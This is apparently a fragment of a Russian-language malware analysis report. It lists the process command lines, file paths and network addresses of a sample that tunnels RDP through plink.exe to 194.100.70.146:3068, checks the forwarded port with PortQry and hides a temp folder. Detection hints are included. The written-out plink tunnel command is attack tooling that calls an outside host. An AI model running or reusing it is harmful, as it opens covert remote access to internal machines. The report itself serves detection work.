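Техническая информация
Примечание: заголовки подразделов отчёта в этом фрагменте не сохранились, поэтому ниже подряд идут командные строки процессов, пути к файлам и сетевые адреса; повторяющиеся пути, вероятно, относятся к разным подразделам. Судя по командной строке plink.exe, устанавливается SSH-соединение с 194.100.70.146:3068, и локальный порт 11000 пробрасывается на 192.168.10.23:3389 (стандартный порт RDP). PortQry.exe с параметрами -q -n localhost -e 11000 проверяет этот локальный порт, а attrib.exe +h делает каталог %TEMP%\ztmp скрытым. Для обнаружения полезны запуск plink.exe и PortQry.exe из %TEMP% и проброс портов (-L) на 3389.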
- '%TEMP%\afolder\PortQry.exe' /pid=2640
- '%TEMP%\afolder\PortQry.exe' /pid=1760
- '%TEMP%\afolder\PortQry.exe' -q -n localhost -e 11000
- '%TEMP%\afolder\avaaJDtrm.exe'
- '%TEMP%\afolder\plink.exe' -ssh 194.100.70.146 -P 3068 -l %USERNAME% -L 11000:192.168.10.23:3389
- '<SYSTEM32>\attrib.exe' -q -n localhost -e 11000
- '<SYSTEM32>\attrib.exe' +h %TEMP%\ztmp
- <SYSTEM32>\cmd.exe
- <SYSTEM32>\attrib.exe
- %TEMP%\ztmp\tmp1415.bat
- %TEMP%\afolder\PortQry.exe
- %TEMP%\afolder\JDtrm.RDP
- %TEMP%\ztmp\tmp4555.exe
- <LS_APPDATA>\PUTTY.RND
- %TEMP%\afolder\plink.exe
- %TEMP%\afolder\avaaJDtrm.exe
- %TEMP%\ztmp\tmp1699.exe
- %TEMP%\ztmp\tmp1650.bat
- %TEMP%\ztmp\tmp1699.exe
- %TEMP%\afolder\plink.exe
- %TEMP%\afolder\avaaJDtrm.exe
- 'localhost':11000
- '19#.#00.70.146':3068